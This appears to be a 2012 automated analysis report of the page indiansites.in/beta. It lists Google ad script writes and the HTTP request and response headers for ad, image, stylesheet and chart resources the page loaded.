<ins style="display:inline-table;border:none;height:15px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><ins id="aswift_0_anchor" style="display:block;border:none;height:15px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><iframe allowtransparency="true" frameborder="0" height="15" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="468" id=aswift_0 name=aswift_0 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#16 JavaScript::Write (size: 766, repeated: 1)

<ins style="display:inline-table;border:none;height:15px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><ins id="aswift_1_anchor" style="display:block;border:none;height:15px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><iframe allowtransparency="true" frameborder="0" height="15" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="468" id=aswift_1 name=aswift_1 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#17 JavaScript::Write (size: 766, repeated: 1)

<ins style="display:inline-table;border:none;height:15px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><ins id="aswift_2_anchor" style="display:block;border:none;height:15px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><iframe allowtransparency="true" frameborder="0" height="15" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="468" id=aswift_2 name=aswift_2 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#18 JavaScript::Write (size: 769, repeated: 1)

<ins style="display:inline-table;border:none;height:600px;margin:0;padding:0;position:relative;visibility:visible;width:120px"><ins id="aswift_5_anchor" style="display:block;border:none;height:600px;margin:0;padding:0;position:relative;visibility:visible;width:120px"><iframe allowtransparency="true" frameborder="0" height="600" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="120" id=aswift_5 name=aswift_5 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#19 JavaScript::Write (size: 766, repeated: 1)

<ins style="display:inline-table;border:none;height:60px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><ins id="aswift_3_anchor" style="display:block;border:none;height:60px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="468" id=aswift_3 name=aswift_3 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#20 JavaScript::Write (size: 766, repeated: 1)

<ins style="display:inline-table;border:none;height:60px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><ins id="aswift_4_anchor" style="display:block;border:none;height:60px;margin:0;padding:0;position:relative;visibility:visible;width:468px"><iframe allowtransparency="true" frameborder="0" height="60" hspace="0" marginwidth="0" marginheight="0" onload="var i=this.id,s=window.google_iframe_oncopy,H=s&amp;&amp;s.handlers,h=H&amp;&amp;H[i],w=this.contentWindow,d;try{d=w.document}catch(e){}if(h&amp;&amp;d&amp;&amp;(!d.body||!d.body.firstChild)){if(h.call){setTimeout(h,0)}else if(h.match){w.location.replace(h)}}" scrolling="no" vspace="0" width="468" id=aswift_4 name=aswift_4 style="left:0;position:absolute;top:0;" ></iframe></ins></ins>

#21 JavaScript::Write (size: 586, repeated: 1)

<script src = "http://pubads.g.doubleclick.net/gampad/ads?correlator=3822782316923799&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-8412828530142307&slotname=homepage_right&page_slots=homepage_right&cookie_enabled=1&url=http%3A%2F%2Fwww.indiansites.in%2Fbeta%2F&lmt=1352339075&dt=1352339077203&cc=16&biw=1159&bih=778&adk=2104700816&adx=869&ady=979&ifi=7&oid=3&u_tz=60&u_his=1&u_java=true&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&flash=10.0.45&gads=v2&ga_vid=387901256.1352339077&ga_sid=1352339077&ga_hid=1874162876"></script>

#22 JavaScript::Write (size: 86, repeated: 6)

<script src="http://pagead2.googlesyndication.com/pagead/expansion_embed.js"></script>

#23 JavaScript::Write (size: 80, repeated: 1)

<script src="http://partner.googleadservices.com/gampad/google_ads.js"></script>

#24 JavaScript::Write (size: 105, repeated: 6)

<script>google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);</script>


HTTP Transactions (71)


Request Response
GET /pagead/show_ads.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
If-None-Match: 15032493890200785914
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 11458789474174950078
Date: Thu, 08 Nov 2012 01:35:02 GMT
Expires: Thu, 08 Nov 2012 02:35:02 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5118
X-XSS-Protection: 1; mode=block
Age: 573
Cache-Control: public, max-age=3600
GET /beta/ HTTP/1.1

Host: www.indiansites.in

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html
Date: Thu, 08 Nov 2012 01:44:35 GMT
Server: Apache
Content-Encoding: gzip
Set-Cookie: PHPSESSID=3c70d4c3d7a2eaa5b8884011ad1a962c; path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /images/poweredby_transparent/poweredby_FFFFFF.gif HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: image/gif
Last-Modified: Mon, 02 Apr 2012 02:13:37 GMT
Date: Thu, 08 Nov 2012 01:44:35 GMT
Expires: Thu, 08 Nov 2012 01:44:35 GMT
Cache-Control: private, max-age=31536000
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 1341
X-XSS-Protection: 1; mode=block
GET /favicon.ico HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:34 GMT
Content-Length: 136
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/styles.css HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=9174751853669686792; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:34 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/calendar-system.css HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=6106880429970206720; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:34 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/mn_new_listings.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=2824420034435560216; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/logo.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=495709789479985152; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/mn_hot_listings.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=9064846845994303832; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 8840
Age: 0
Connection: keep-alive
GET /cse/api/branding.css HTTP/1.1

Host: www.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/css
Last-Modified: Sat, 17 Nov 2007 23:34:50 GMT
Date: Wed, 07 Nov 2012 20:35:19 GMT
Expires: Fri, 09 Nov 2012 20:35:19 GMT
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Server: pfe
Content-Length: 322
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=172800
Age: 18557
GET /beta/blocks/block.login.php HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=5571683719332970496; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:34 GMT
Content-Length: 689
Age: 1
Connection: keep-alive
GET /beta/blocks/block.whos_online.php HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=7727658400667470952; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:34 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /gampad/google_service.js HTTP/1.1

Host: partner.googleadservices.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 12297147111623355119
Date: Thu, 08 Nov 2012 01:35:16 GMT
Expires: Thu, 08 Nov 2012 02:35:16 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 1661
X-XSS-Protection: 1; mode=block
Age: 560
Cache-Control: public, max-age=3600
GET /beta/themes/kosmos/images/mn_top_rated.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=3669151203338227712; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:34 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /news/tbn/EkxUtAk1PsBxjM/0.jpg HTTP/1.1

Host: nt2.ggpht.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Wed, 07 Nov 2012 17:02:41 GMT
Date: Thu, 08 Nov 2012 00:57:29 GMT
Expires: Thu, 15 Nov 2012 00:57:29 GMT
X-Content-Type-Options: nosniff
Server: News image server
Content-Length: 1721
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=604800
Age: 2827
GET /beta/themes/kosmos/images/mn_editor_pick.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=6315109272143571856; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8837
Age: 0
Connection: keep-alive
GET /news/tbn/ZKY7P8VM2htATM/0.jpg HTTP/1.1

Host: nt0.ggpht.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Wed, 07 Nov 2012 20:20:59 GMT
Date: Thu, 08 Nov 2012 00:57:29 GMT
Expires: Thu, 15 Nov 2012 00:57:29 GMT
X-Content-Type-Options: nosniff
Server: News image server
Content-Length: 1607
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=604800
Age: 2827
GET /news/tbn/zCxwV9ikQ1InDM/0.jpg HTTP/1.1

Host: nt0.ggpht.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Wed, 07 Nov 2012 15:12:57 GMT
Date: Thu, 08 Nov 2012 00:57:29 GMT
Expires: Thu, 15 Nov 2012 00:57:29 GMT
X-Content-Type-Options: nosniff
Server: News image server
Content-Length: 1098
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=604800
Age: 2827
GET /news/tbn/La__1r-O16C61M/0.jpg HTTP/1.1

Host: nt1.ggpht.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Wed, 07 Nov 2012 22:05:58 GMT
Date: Thu, 08 Nov 2012 00:57:29 GMT
Expires: Thu, 15 Nov 2012 00:57:29 GMT
X-Content-Type-Options: nosniff
Server: News image server
Content-Length: 2723
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=604800
Age: 2827
GET /beta/themes/kosmos/images/mn_add_a_listing.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: fc=fcVal=7015792487363104768; domain=hiindians.com; expires=Fri, 01-Jan-2038 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:35 GMT
Content-Length: 689
Age: 0
Connection: keep-alive
GET /beta/themes/kosmos/images/logo.gif HTTP/1.1

Host: www.hiindians.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
Cookie: fc=fcVal=495709789479985152
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 08 Nov 2012 01:44:36 GMT
Content-Length: 8846
Age: 0
Connection: keep-alive
GET /pagead/js/r20121031/r20120730/show_ads_impl.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 14655871875321016899
Date: Wed, 07 Nov 2012 20:35:01 GMT
Expires: Wed, 21 Nov 2012 20:35:01 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 19222
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 18575
GET /t?s=%5EBSESN HTTP/1.1

Host: ichart.finance.yahoo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 01:44:36 GMT
Set-Cookie: B=0hn3k9t89m3k4&amp;b=3&amp;s=f4; expires=Tue, 09-Nov-2014 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Last-Modified: Thu, 8 Nov 2012 01:44:36 GMT
Expires: Thu, 8 Nov 2012 01:45:36 GMT
Content-Length: 6433
Connection: close
Cache-Control: private
GET /t?s=%5EDJI HTTP/1.1

Host: ichart.finance.yahoo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.indiansites.in/beta/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 01:44:36 GMT
Set-Cookie: B=b2gf4sp89m3k4&amp;b=3&amp;s=t7; expires=Tue, 09-Nov-2014 20:00:00 GMT; path=/; domain=.yahoo.com
